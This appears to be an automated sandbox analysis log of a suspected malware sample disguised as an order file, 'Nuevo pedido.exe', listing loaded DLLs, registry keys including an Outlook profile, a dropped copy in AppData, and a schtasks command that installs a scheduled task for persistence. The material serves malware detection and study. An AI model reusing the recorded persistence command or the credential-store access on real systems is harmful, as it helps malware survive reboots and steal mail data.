Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: edputil.dll

Source: C:\Users\user\Desktop\Nuevo pedido.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\Nuevo pedido.exe	Automated click: OK
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Nuevo pedido.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\Nuevo pedido.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Nuevo pedido.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Nuevo pedido.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: Nuevo pedido.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: btC:\Windows\dll\mscorlib.pdb'w source: QGVhHsAOjb.exe, 0000000E.00000002.4153254455.0000000006AEE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: uindows\hEab.pdbpdbEab.pdb source: QGVhHsAOjb.exe, 0000000E.00000002.4153254455.0000000006AEE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: hEab.pdb source: Nuevo pedido.exe, QGVhHsAOjb.exe.0.dr
Source:	Binary string: hEab.pdbSHA256 source: Nuevo pedido.exe, QGVhHsAOjb.exe.0.dr

Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 0_2_02676670 pushad ; retf	0_2_026766AD
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 0_2_026766F7 pushfd ; retf	0_2_02676701
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 0_2_02676B30 pushfd ; iretd	0_2_02676B31
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 0_2_02675D95 push FFFFFF8Bh; iretd	0_2_02675D97
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 10_2_05718693 push eax; ret	10_2_057186C3
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 10_2_05717BB8 push eax; mov dword ptr [esp], ecx	10_2_05717BBC
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 14_2_03059C30 push esp; retf 0312h	14_2_03059D55

Source: Nuevo pedido.exe	Static PE information: section name: .text entropy: 7.94951474543567
Source: QGVhHsAOjb.exe.0.dr	Static PE information: section name: .text entropy: 7.94951474543567

Source: C:\Users\user\Desktop\Nuevo pedido.exe

File created: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\Nuevo pedido.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QGVhHsAOjb" /XML "C:\Users\user\AppData\Local\Temp\tmp56AD.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Nuevo pedido.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
